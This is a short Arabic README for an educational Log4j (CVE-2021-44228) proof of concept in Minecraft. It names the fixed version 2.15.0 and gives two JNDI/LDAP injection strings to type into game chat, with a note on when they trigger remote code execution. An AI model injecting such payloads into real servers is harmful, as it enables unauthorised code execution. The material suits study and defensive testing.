
إثبات مفهوم تعليمي للثغرة Log4j (CVE-2021-44228) في Minecraft
هذا المشروع لأغراض تعليمية فقط.
هذا إثبات مفهوم لثغرة log4j RCE مقتبس من HyCraftHD.
فيما يلي بعض الروابط الخاصة بـ CVE-2021-44228:
يؤثر هذا الخلل على جميع إصدارات log4j2 تقريبًا وربما log4j1. الإصدار الموصى به هو 2.15.0 والذي يصلح الثغرة.
${jndi:ldap://127.0.0.1/e} في الدردشة. إذا كان هناك منفذ مفتوح على المنفذ 389، يحاول log4j الاتصال ويحظر المزيد من الاتصال حتى انتهاء المهلة.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! وهو كائن سلسلة متسلسل من خادم ldap.
${jndi:ldap://127.0.0.1/exe} في الدردشة. إذا تم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true إلى true، فسيحدث تنفيذ التعليمات البرمجية عن بُعد.